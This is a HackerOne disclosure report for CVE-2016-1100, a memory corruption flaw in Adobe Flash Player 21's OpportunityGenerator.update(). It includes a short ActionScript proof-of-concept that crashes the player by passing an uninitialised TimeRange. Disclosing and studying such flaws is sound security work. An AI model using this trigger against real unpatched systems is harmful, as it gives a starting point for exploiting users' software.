Adobe Flash Player OpportunityGenerator class Memory Corruption Vulnerability
Unknown
Vulnerability Details
I. Summary
Adobe Flash Player is prone to a vulnerability which leads to memory corruption because of improper validation of OpportunityGenerator.update().
------------------------------------------------------------------
II. Description
Adobe Flash is a multimedia and software platform used for authoring of vector graphics, animation, games and rich Internet applications (RIAs) that can be viewed, played and executed in Adobe Flash Player.
Normally, update() should validates its parameter and returns error in AS3 level if anything goes wrong.
If update() function is invoked directly with invalid parameter, some inner class instance will be absent, which will cause a memory crash.
POC Source Code:
package
{
import com.adobe.tvsdk.mediacore.PSDK;
import com.adobe.tvsdk.mediacore.utils.TimeRange;
import flash.display.Sprite;
public class poc extends Sprite
{
public function poc()
{
var ps:PSDK = PSDK.pSDK;
var tr:TimeRange;
ps.createOpportunityGenerator(0).update(1,tr);
}
}
}
------------------------------------------------------------------
III. Impact
Memory Corruption
------------------------------------------------------------------
IV. Affected
Adobe Flash Player 21.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Pangu LAB is credited for this vulnerability.
It has been assigned as CVE-2016-1100 by Adobe:
https://helpx.adobe.com/security/products/flash-player/apsb16-15.html
Actions
View on HackerOneReport Stats
- Report ID: 138518
- State: Closed
- Substate: resolved
- Upvotes: 2